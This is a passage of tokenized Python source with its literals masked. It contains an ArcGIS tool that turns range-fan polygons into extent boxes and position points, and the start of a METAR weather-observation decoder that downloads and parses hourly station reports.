] ) <EOL> msgs = "<STR_LIT>" + arcpy . GetMessages ( ) + "<STR_LIT:\n>" <EOL> arcpy . AddError ( pymsg ) <EOL> arcpy . AddError ( msgs ) <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> RunTest ( ) </s>
<s> </s>
<s> import os , sys , math , traceback <EOL> import arcpy <EOL> from arcpy import env <EOL> from arcpy import da <EOL> deleteme = [ ] <EOL> debug = False <EOL> inputFeatures = arcpy . GetParameterAsText ( <NUM_LIT:0> ) <EOL> outputExtentBoxes = arcpy . GetParameterAsText ( <NUM_LIT:1> ) <EOL> outputWeaponPositions = arcpy . GetParameterAsText ( <NUM_LIT:2> ) <EOL> GCS_WGS_1984 = arcpy . SpatialReference ( r"<STR_LIT>" ) <EOL> def Geo2Arithmetic ( inAngle ) : <EOL> outAngle = - <NUM_LIT:1.0> <EOL> if ( inAngle > <NUM_LIT> ) : <EOL> inAngle = math . fmod ( inAngle , <NUM_LIT> ) <EOL> if inAngle == <NUM_LIT> : inAngle = <NUM_LIT:0.0> <EOL> if ( inAngle >= <NUM_LIT:0.0> and inAngle <= <NUM_LIT> ) : <EOL> outAngle = math . fabs ( inAngle - <NUM_LIT> ) <EOL> if ( inAngle > <NUM_LIT> and inAngle < <NUM_LIT> ) : <EOL> outAngle = <NUM_LIT> - ( inAngle - <NUM_LIT> ) <EOL> return outAngle <EOL> try : <EOL> inputFeaturesDesc = arcpy . Describe ( inputFeatures ) <EOL> inputFeaturesShapeName = inputFeaturesDesc . shapeFieldName <EOL> inputFeaturesOID = inputFeaturesDesc . oidFieldName <EOL> inputFeatureSR = inputFeaturesDesc . spatialReference <EOL> scratch = env . scratchWorkspace <EOL> outputExtentBoxes = arcpy . CreateFeatureclass_management ( os . path . dirname ( outputExtentBoxes ) , os . path . basename ( outputExtentBoxes ) , "<STR_LIT>" , "<STR_LIT:#>" , "<STR_LIT>" , "<STR_LIT>" , inputFeatureSR ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . 
AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> arcpy . AddField_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" ) <EOL> outputExtentBoxesOID = arcpy . Describe ( outputExtentBoxes ) . oidFieldName <EOL> searchRows = arcpy . da . SearchCursor ( inputFeatures , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> writeRows = arcpy . da . InsertCursor ( outputExtentBoxes , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> for currentRead in searchRows : <EOL> currentReadID = currentRead [ <NUM_LIT:0> ] <EOL> arcpy . AddMessage ( "<STR_LIT>" + str ( currentReadID ) ) <EOL> partCoordList = [ ] <EOL> for part in currentRead [ <NUM_LIT:1> ] : <EOL> for pnt in part : <EOL> partCoordList . append ( arcpy . Point ( pnt . X , pnt . Y ) ) <EOL> startPoint = partCoordList [ <NUM_LIT:0> ] <EOL> secondPoint = partCoordList [ <NUM_LIT:1> ] <EOL> n2Point = partCoordList [ len ( partCoordList ) - <NUM_LIT:2> ] <EOL> fanRange = currentRead [ <NUM_LIT:3> ] <EOL> width = math . sqrt ( math . pow ( secondPoint . X - n2Point . X , <NUM_LIT:2> ) + math . pow ( secondPoint . Y - n2Point . Y , <NUM_LIT:2> ) ) <EOL> halfWidth = width / <NUM_LIT> <EOL> if debug == True : arcpy . 
AddMessage ( "<STR_LIT>" + str ( fanRange ) + "<STR_LIT:U+002C>" + str ( width ) ) <EOL> bearing = currentRead [ <NUM_LIT:2> ] <EOL> leftAz = currentRead [ <NUM_LIT:4> ] <EOL> rightAz = currentRead [ <NUM_LIT:5> ] <EOL> bearingDegrees = bearing <EOL> backBearing = <NUM_LIT:0.0> <EOL> if bearing < <NUM_LIT> : <EOL> backBearing = <NUM_LIT> + ( bearing - <NUM_LIT> ) <EOL> else : <EOL> backBearing = bearing - <NUM_LIT> <EOL> leftBearing = <NUM_LIT:0.0> <EOL> if bearing < <NUM_LIT> : <EOL> leftBearing = <NUM_LIT> + ( bearing - <NUM_LIT> ) <EOL> else : <EOL> leftBearing = bearing - <NUM_LIT> <EOL> rightBearing = <NUM_LIT:0.0> <EOL> if bearing > <NUM_LIT> : <EOL> rightBearing = math . fabs ( <NUM_LIT> - ( bearing + <NUM_LIT> ) ) <EOL> else : <EOL> rightBearing = bearing + <NUM_LIT> <EOL> if debug == True : arcpy . AddMessage ( "<STR_LIT>" + str ( bearing ) + "<STR_LIT:U+002C>" + str ( leftBearing ) + "<STR_LIT:U+002C>" + str ( rightBearing ) + "<STR_LIT:U+002C>" + str ( backBearing ) ) <EOL> boxArray = arcpy . Array ( ) <EOL> llX = startPoint . X + ( halfWidth * math . cos ( math . radians ( Geo2Arithmetic ( leftBearing ) ) ) ) <EOL> llY = startPoint . Y + ( halfWidth * math . sin ( math . radians ( Geo2Arithmetic ( leftBearing ) ) ) ) <EOL> llPoint = arcpy . Point ( llX , llY ) <EOL> boxArray . add ( llPoint ) <EOL> ulX = llPoint . X + ( fanRange * math . cos ( math . radians ( Geo2Arithmetic ( bearing ) ) ) ) <EOL> ulY = llPoint . Y + ( fanRange * math . sin ( math . radians ( Geo2Arithmetic ( bearing ) ) ) ) <EOL> ulPoint = arcpy . Point ( ulX , ulY ) <EOL> boxArray . add ( ulPoint ) <EOL> urX = ulPoint . X + ( width * math . cos ( math . radians ( Geo2Arithmetic ( rightBearing ) ) ) ) <EOL> urY = ulPoint . Y + ( width * math . sin ( math . radians ( Geo2Arithmetic ( rightBearing ) ) ) ) <EOL> urPoint = arcpy . Point ( urX , urY ) <EOL> boxArray . add ( urPoint ) <EOL> lrX = urPoint . X + ( fanRange * math . cos ( math . 
radians ( Geo2Arithmetic ( backBearing ) ) ) ) <EOL> lrY = urPoint . Y + ( fanRange * math . sin ( math . radians ( Geo2Arithmetic ( backBearing ) ) ) ) <EOL> lrPoint = arcpy . Point ( lrX , lrY ) <EOL> boxArray . add ( lrPoint ) <EOL> boxArray . add ( llPoint ) <EOL> boxPolygon = arcpy . Polygon ( boxArray ) <EOL> writeRows . insertRow ( [ boxPolygon , currentReadID , bearing , fanRange , width , leftAz , rightAz , startPoint . X , startPoint . Y ] ) <EOL> del searchRows <EOL> del writeRows <EOL> arcpy . AddMessage ( "<STR_LIT>" ) <EOL> arcpy . MakeXYEventLayer_management ( outputExtentBoxes , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , inputFeatureSR ) <EOL> arcpy . CopyFeatures_management ( "<STR_LIT>" , outputWeaponPositions ) <EOL> tempGeoPoints = os . path . join ( scratch , "<STR_LIT>" ) <EOL> deleteme . append ( tempGeoPoints ) <EOL> arcpy . Project_management ( outputWeaponPositions , tempGeoPoints , GCS_WGS_1984 ) <EOL> arcpy . AddXY_management ( tempGeoPoints ) <EOL> tempCCNPoints = os . path . join ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> deleteme . append ( tempCCNPoints ) <EOL> arcpy . ConvertCoordinateNotation_management ( tempGeoPoints , tempCCNPoints , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , GCS_WGS_1984 ) <EOL> arcpy . JoinField_management ( outputWeaponPositions , "<STR_LIT>" , tempCCNPoints , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> arcpy . SetParameter ( <NUM_LIT:1> , outputExtentBoxes ) <EOL> arcpy . SetParameter ( <NUM_LIT:2> , outputWeaponPositions ) <EOL> except arcpy . ExecuteError : <EOL> msgs = arcpy . GetMessages ( ) <EOL> arcpy . AddError ( msgs ) <EOL> print msgs <EOL> except : <EOL> tb = sys . exc_info ( ) [ <NUM_LIT:2> ] <EOL> tbinfo = traceback . format_tb ( tb ) [ <NUM_LIT:0> ] <EOL> pymsg = "<STR_LIT>" + tbinfo + "<STR_LIT>" + str ( sys . exc_info ( ) [ <NUM_LIT:1> ] ) <EOL> msgs = "<STR_LIT>" + arcpy . GetMessages ( ) + "<STR_LIT:\n>" <EOL> arcpy . AddError ( pymsg ) <EOL> arcpy . 
AddError ( msgs ) <EOL> print pymsg + "<STR_LIT:\n>" <EOL> print msgs <EOL> finally : <EOL> if debug == True : arcpy . AddMessage ( "<STR_LIT>" ) <EOL> for i in deleteme : <EOL> if debug == True : arcpy . AddMessage ( "<STR_LIT>" + str ( i ) ) <EOL> arcpy . Delete_management ( i ) <EOL> if debug == True : arcpy . AddMessage ( "<STR_LIT>" ) </s>
<s> import ALFlib , os , sys , tempfile , time , urllib2 <EOL> from datetime import datetime <EOL> from datetime import timedelta <EOL> class MetarReader ( object ) : <EOL> """<STR_LIT>""" <EOL> version = "<STR_LIT>" <EOL> obsType = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> equipment = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> direction = ALFlib . Constants . TrueNorth <EOL> tendency = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:D>' : '<STR_LIT>' , <EOL> '<STR_LIT:N>' : '<STR_LIT>' <EOL> } <EOL> pressureTendency = { <EOL> '<STR_LIT:0>' : '<STR_LIT>' , <EOL> '<STR_LIT:1>' : '<STR_LIT>' , <EOL> '<STR_LIT:2>' : '<STR_LIT>' , <EOL> '<STR_LIT:3>' : '<STR_LIT>' , <EOL> '<STR_LIT:4>' : '<STR_LIT>' , <EOL> '<STR_LIT:5>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> qualifier = { <EOL> '<STR_LIT:M>' : '<STR_LIT:<>' , <EOL> '<STR_LIT:P>' : '<STR_LIT:>>' <EOL> } <EOL> intensity = { <EOL> '<STR_LIT:->' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:+>' : '<STR_LIT>' <EOL> } <EOL> proximity = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> descriptor = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> conjunction = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> precipitation = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> obscuration = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> other = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> coverage = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> totalCloudCover = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:20> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:100> <EOL> } <EOL> visibilityCode = { <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> 
'<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> } <EOL> remarks = { <EOL> '<STR_LIT:$>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:E>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:N>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:S>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> obs = { } <EOL> orderedObs = [ ] <EOL> skipped = [ ] <EOL> weatherStations = None <EOL> timeStamp = None <EOL> data = [ ] <EOL> undecoded = { } <EOL> verbose = False <EOL> totalObs = <NUM_LIT:0> <EOL> hundred = <NUM_LIT:0> <EOL> notHundred = <NUM_LIT:0> <EOL> def __init__ ( self , verbose = False , decode = True , cycle = False ) : <EOL> self . verbose = verbose <EOL> self . currentCycle = cycle <EOL> if decode : <EOL> self . decode ( ) <EOL> def __contains__ ( self , item ) : <EOL> return ( item in self . obs ) <EOL> def __getitem__ ( self , item ) : <EOL> if isinstance ( item , int ) or isinstance ( item , long ) : <EOL> if item < <NUM_LIT:0> or item >= len ( self . 
obs ) : <EOL> raise IndexError ( item ) <EOL> else : <EOL> return self . obs [ self . orderedObs [ item ] ] <EOL> if not item in self . obs : <EOL> raise KeyError ( item ) <EOL> else : <EOL> return self . obs [ item ] <EOL> def __len__ ( self ) : <EOL> return len ( self . obs ) <EOL> def loadStations ( self ) : <EOL> if self . verbose : <EOL> sys . stdout . write ( "<STR_LIT>" ) <EOL> self . weatherStations = ALFlib . WeatherStationLoader ( <NUM_LIT:1> ) <EOL> if self . verbose : <EOL> sys . stdout . write ( "<STR_LIT>" ) <EOL> def decode ( self , argv = [ ] ) : <EOL> argc = len ( argv ) <EOL> if not self . weatherStations : <EOL> self . loadStations ( ) <EOL> utcNow = datetime . utcnow ( ) <EOL> hour = utcNow . hour <EOL> cycles = [ ] <EOL> if utcNow . minute < <NUM_LIT:50> : <EOL> hour -= <NUM_LIT:1> <EOL> if hour < <NUM_LIT:0> : <EOL> hour = <NUM_LIT> <EOL> cycles . append ( hour ) <EOL> if self . currentCycle : <EOL> hour = utcNow . hour <EOL> if utcNow . minute >= <NUM_LIT:50> : <EOL> hour += <NUM_LIT:1> <EOL> if hour > <NUM_LIT> : <EOL> hour = <NUM_LIT:0> <EOL> cycles . append ( hour ) <EOL> if self . verbose : <EOL> print utcNow + timedelta ( <NUM_LIT:1> ) <EOL> if self . verbose : <EOL> print "<STR_LIT>" <EOL> self . totalObs = <NUM_LIT:0> <EOL> self . hundred = <NUM_LIT:0> <EOL> self . notHundred = <NUM_LIT:0> <EOL> if self . obs : <EOL> self . obs = { } <EOL> self . orderedObs = [ ] <EOL> self . skipped = [ ] <EOL> for hour in cycles : <EOL> fileName = "<STR_LIT>" . format ( hour ) <EOL> source = "<STR_LIT>" . format ( fileName ) <EOL> iFP = urllib2 . urlopen ( source ) <EOL> if self . verbose : <EOL> print "<STR_LIT>" . format ( fileName , utcNow . hour , utcNow . minute ) <EOL> line = True <EOL> while line : <EOL> line = iFP . readline ( ) <EOL> try : <EOL> if len ( line ) > <NUM_LIT:15> : <EOL> if ( line [ <NUM_LIT:4> ] == "<STR_LIT:/>" ) and ( line [ <NUM_LIT:7> ] == "<STR_LIT:/>" ) and ( line [ <NUM_LIT> ] == "<STR_LIT::>" ) : <EOL> self . 
timeStamp = datetime ( int ( line [ <NUM_LIT:0> : <NUM_LIT:4> ] ) , int ( line [ <NUM_LIT:5> : <NUM_LIT:7> ] ) , int ( line [ <NUM_LIT:8> : <NUM_LIT:10> ] ) , int ( line [ <NUM_LIT:11> : <NUM_LIT> ] ) , int ( line [ <NUM_LIT> : <NUM_LIT:16> ] ) ) <EOL> else : <EOL> self . totalObs += <NUM_LIT:1> <EOL> self . data = line . split ( ) <EOL> ok2print = False <EOL> for index in range ( <NUM_LIT:0> , argc ) : <EOL> if line . find ( argv [ index ] ) != - <NUM_LIT:1> : <EOL> if ( index + <NUM_LIT:1> ) == argc : <EOL> ok2print = True <EOL> else : <EOL> break <EOL> observation = self . decodeMetar ( ) <EOL> if type ( observation ) == dict and '<STR_LIT>' in observation : <EOL> observation [ '<STR_LIT>' ] = line <EOL> if observation [ '<STR_LIT>' ] not in self . obs : <EOL> self . orderedObs . append ( observation [ '<STR_LIT>' ] ) <EOL> self . obs [ observation [ '<STR_LIT>' ] ] = observation <EOL> if observation [ '<STR_LIT>' ] [ '<STR_LIT>' ] != <NUM_LIT:100> : <EOL> self . notHundred += <NUM_LIT:1> <EOL> else : <EOL> self . hundred += <NUM_LIT:1> <EOL> for index in range ( <NUM_LIT:0> , argc ) : <EOL> if observation [ '<STR_LIT>' ] == argv [ index ] : <EOL> ok2print = True <EOL> else : <EOL> observation = "<STR_LIT>" . format ( observation , line ) <EOL> self . skipped . append ( observation ) <EOL> if ok2print : <EOL> print <EOL> if type ( observation ) == dict and '<STR_LIT>' in observation : <EOL> print "<STR_LIT>" . format ( observation [ '<STR_LIT>' ] ) <EOL> print "<STR_LIT>" <EOL> print observation <EOL> except Exception as e : <EOL> sys . stderr . write ( "<STR_LIT>" . format ( line , e ) ) <EOL> self . skipped . append ( "<STR_LIT>" . format ( line ) ) <EOL> iFP . close ( ) <EOL> self . orderedObs . sort ( ) <EOL> if argc == <NUM_LIT:1> : <EOL> if argv [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> for item in self . skipped : <EOL> print item <EOL> for ( key , value ) in self . undecoded . 
iteritems ( ) : <EOL> if argv [ <NUM_LIT:0> ] in value and value [ argv [ <NUM_LIT:0> ] ] > <NUM_LIT:0> : <EOL> print "<STR_LIT>" . format ( key , value ) <EOL> if self . verbose : <EOL> percent = int ( self . hundred / float ( self . hundred + self . notHundred ) * <NUM_LIT:100> ) <EOL> unique = <NUM_LIT:0> <EOL> for item in self . obs . itervalues ( ) : <EOL> if item [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:100> : <EOL> unique += <NUM_LIT:1> <EOL> uniquePercent = int ( unique / float ( len ( self . obs ) ) * <NUM_LIT:100> ) <EOL> print "<STR_LIT>" . format ( self . totalObs , len ( self . skipped ) , len ( self . obs ) ) <EOL> print "<STR_LIT>" . format ( self . hundred , percent , unique , uniquePercent ) <EOL> print "<STR_LIT>" . format ( self . notHundred , <NUM_LIT:100> - percent ) <EOL> def getNext ( self , success = True ) : <EOL> self . valueIndex += <NUM_LIT:1> <EOL> if success : <EOL> self . decoded += <NUM_LIT:1> <EOL> if self . foundRemark : <EOL> self . remarksDecoded += <NUM_LIT:1> <EOL> else : <EOL> self . standardDecoded += <NUM_LIT:1> <EOL> else : <EOL> idx = self . valueIndex - <NUM_LIT:1> <EOL> if idx >= <NUM_LIT:0> and idx < len ( self . data ) : <EOL> if not self . data [ idx ] in self . undecoded : <EOL> self . undecoded [ self . data [ idx ] ] = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> <EOL> } <EOL> if self . foundRemark : <EOL> self . undecoded [ self . data [ idx ] ] [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> else : <EOL> self . undecoded [ self . data [ idx ] ] [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> if self . valueIndex < len ( self . data ) : <EOL> value = self . data [ self . valueIndex ] <EOL> if ( value == '<STR_LIT>' ) or ( value == '<STR_LIT>' ) : <EOL> value = self . getNext ( ) <EOL> if ( self . valueIndex > <NUM_LIT:1> ) and ( value in self . weatherStations ) : <EOL> self . valueIndex = len ( self . 
data ) <EOL> return '<STR_LIT>' <EOL> elif ( len ( value ) >= <NUM_LIT:3> ) and ( value [ <NUM_LIT:0> : <NUM_LIT:3> ] == '<STR_LIT>' ) : <EOL> self . foundRemark = True <EOL> self . remarkIndex = self . valueIndex <EOL> value = self . getNext ( ) <EOL> if value : <EOL> try : <EOL> return value . decode ( ) <EOL> except Exception as e : <EOL> sys . stderr . write ( "<STR_LIT>" . format ( value ) ) <EOL> return self . getNext ( False ) <EOL> return '<STR_LIT>' <EOL> def peekNext ( self ) : <EOL> if ( self . valueIndex + <NUM_LIT:1> ) < len ( self . data ) : <EOL> try : <EOL> return self . data [ self . valueIndex + <NUM_LIT:1> ] . decode ( ) <EOL> except : <EOL> pass <EOL> return '<STR_LIT>' <EOL> def decodeMetar ( self ) : <EOL> obs = { <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:Name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> } , <EOL> '<STR_LIT>' : { <EOL> } , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> 